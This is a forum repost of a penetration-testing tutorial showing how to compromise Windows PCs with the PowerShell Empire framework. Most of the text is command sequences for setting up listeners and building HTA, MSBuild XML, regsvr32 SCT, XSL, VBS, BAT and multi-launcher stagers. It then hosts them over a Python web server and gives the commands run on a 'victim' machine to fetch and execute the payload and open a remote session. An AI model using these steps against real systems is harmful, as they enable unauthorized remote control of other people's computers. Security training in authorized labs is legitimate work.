Nytro Posted February 4, 2019 Report Posted February 4, 2019 Multiple Ways to Exploiting Windows PC using PowerShell Empire posted in Penetration Testing on February 4, 2019 by Raj Chandel SHARE This is our second post in the article series ‘PowerShell Empire’. In this article we will cover all the exploits that leads to windows exploitation with empire. To our first post on empire series, which gives a basic guide to navigate your way through empire, click here. Table of content: Exploiting through HTA Exploiting through MSBuild.exe Exploiting through regsvr32 XSL exploit Exploiting through visual basic script BAT exploit Multi_launcher exploit Exploiting through HTA This attack helps us to exploit windows through .hta. when .hta file is run via mshta.exe it executes as .exe file with similar functionality which lets us hack our way through. To know more about this attack please click here. To run type ‘./Empire’. According to the work flow, firstly, we have to create a listener to listen on our local machine. Type the following command: listeners 1 listeners After running the above command, it will say that “no listeners are currently active” but don’t worry, we are into the listener interface now. So in this listener interface, type : uselistener http set Host execute 1 2 3 uselistener http set Host execute Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type : usestager windows/hta set Listener http set OutFile /root/1.hta execute 1 2 3 4 usestager windows/hta set Listener http set OutFile /root/1.hta execute Running the above commands will create an .hta file to be used as malware. Start the python server using the following command, in order to share our .hta file: python -m SimpleHTTPServer 8080 1 python -m SimpleHTTPServer 8080 As the python server is up and running, type the following command in victims’ command prompt to execute our malicious file: mshta.exe http:/ 1 mshta.exe http:/ The moment above command is executed you will have your session, to access the session type : interact XDGM6HLE sysinfo 1 2 interact XDGM6HLE sysinfo Exploiting through MSBuild.exe Our next exploit is via MSBuild.exe, which will let you have a remote session of windows using XML file. To know in details about this attack please click here. And to use this exploit type: listeners uselistener http set Host http:/ execute 1 2 3 4 listeners uselistener http set Host http:/ execute This creates a listener, type ‘back’ to go in listener interface to create a exploit. For this, type : usestager windows/launcher_xml set Listener http execute 1 2 3 usestager windows/launcher_xml set Listener http execute Now, an .xml file is created in /tmp. Copy this file in victims’ PC (inside Microsoft.NET\Framework\v4.0.30319\) and run it typing combination of following commands: cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ MSBuild.exe launcher.xml 1 2 cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\ MSBuild.exe launcher.xml So, this way you will have your session, to access the said session type : interact A8H14C7L sysinfo 1 2 interact A8H14C7L sysinfo Exploiting through regsvr32 Our next method is exploiting through regsvr32. To know in detail about this attack, do click here. As always, we have to create a listener first to listen on our local machine. Type the following command: listeners uselistener http set Host execute 1 2 3 4 listeners uselistener http set Host execute Now that a listener is created, type ‘back’ to go in listener interface to create an exploit. For this, type: usestager windows/launcher_sct set Listener http execute 1 2 3 usestager windows/launcher_sct set Listener http execute This will create a .sct file in /tmp. Share this file to victim’s PC using python server and then run this file in run window of victims’ PC by typing the following command: regsvr /u /n /s /i: scrobj.dll 1 regsvr /u /n /s /i: scrobj.dll Thus, you will have an active session. To access the session type: interact <session name> sysinfo 1 2 interact <session name> sysinfo Exploiting through XSL XSL is a language will helps you format data, this also describes how web server will interact with using XML. Our next method of attack with empire is by exploiting .xsl file. For this method lets activate our listener first by typing : listeners uselistener http set Host execute 1 2 3 4 listeners uselistener http set Host execute As the listener is up and running, create your exploit : usestager windows/launcher_xsl set Listener http execute 1 2 3 usestager windows/launcher_xsl set Listener http execute This way .xsl file is created. Now run the python server from the folder where the .xsl file is created as shown in the image below : cd /tmp python -m SimpleHTTPServer 8080 1 2 cd /tmp python -m SimpleHTTPServer 8080 Now execute the following command in the command prompt of your victim: wmic process get brief /format:"" 1 wmic process get brief /format:"" Running above will give a session, to access the session type : interact <session name> sysinfo 1 2 interact <session name> sysinfo Exploiting through Visual Basic script Our next method is to create a malicious VBS file and exploiting our victim through it. Like always, let’s create a listener first. listeners uselistener http set Host execute 1 2 3 4 listeners uselistener http set Host execute Now, to create our malicious .vbs file type : usestager windows/launcher_vbs set Listener http execute 1 2 3 usestager windows/launcher_vbs set Listener http execute Next step is to start the python server by typing: python -m SimpleHTTPServer 8080 1 python -m SimpleHTTPServer 8080 Once the .vbs file is shared through python server and executed in the victim’s PC you will have you r session and just like before to access the session type : interact <session name> sysinfo 1 2 interact <session name> sysinfo Exploiting through .bat In this method, we will exploit through .bat file. Like our previous exploits, this time too, let’s create a listener. For this, type: listeners uselistener http set Host execute back 1 2 3 4 5 listeners uselistener http set Host execute back The above commands will create a listener for you. Let’s create our .bat file using following command : usestager windows/launcher_bat use Listener http set OutFile /root/1.bat execute 1 2 3 4 usestager windows/launcher_bat use Listener http set OutFile /root/1.bat execute As shown, the above commands will create a .bat file. Start up the python server by using following command to allow you share you .bat file on your victim’s pc. python -m SimpleHTTPServer 8080 1 python -m SimpleHTTPServer 8080 Once you run the .bat file, a session will activate. To access the session type: interact <session name> sysinfo 1 2 interact <session name> sysinfo Multi_launcher This is our last method of this post. It can be used on various platforms such as windows, linux, etc. again, even for this method, create a listener: listerners uselistener http set Host execute 1 2 3 4 listerners uselistener http set Host execute Then type following commands for create your malicious file: usestager multi/launcher set listerner http execute 1 2 3 usestager multi/launcher set listerner http execute Once you hit enter after the above commands, it will give you a code. Copy this code and paste it in the command prompt of victim and hit enter. As soon as you hit enter, you will have activated a session. To access the session, type: interact <session name> sysinfo 1 2 interact <session name> sysinfo Conclusion The above were the methods that you can use to exploit windows using different vulnerabilities. Using this framework is an addition to your pentesting skills after Metasploit. Enjoy! Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here ABOUT THE AUTHOR Raj Chandel Raj Chandel is a Skilled and Passionate IT Professional especially in IT-Hacking Industry. At present other than his name he can also be called as An Ethical Hacker, A Cyber Security Expert, A Penetration Tester. With years of quality Experience in IT and software industry Sursa: https://www.hackingarticles.in/multiple-ways-to-exploiting-windows-pc-using-powershell-empire/ 3 Quote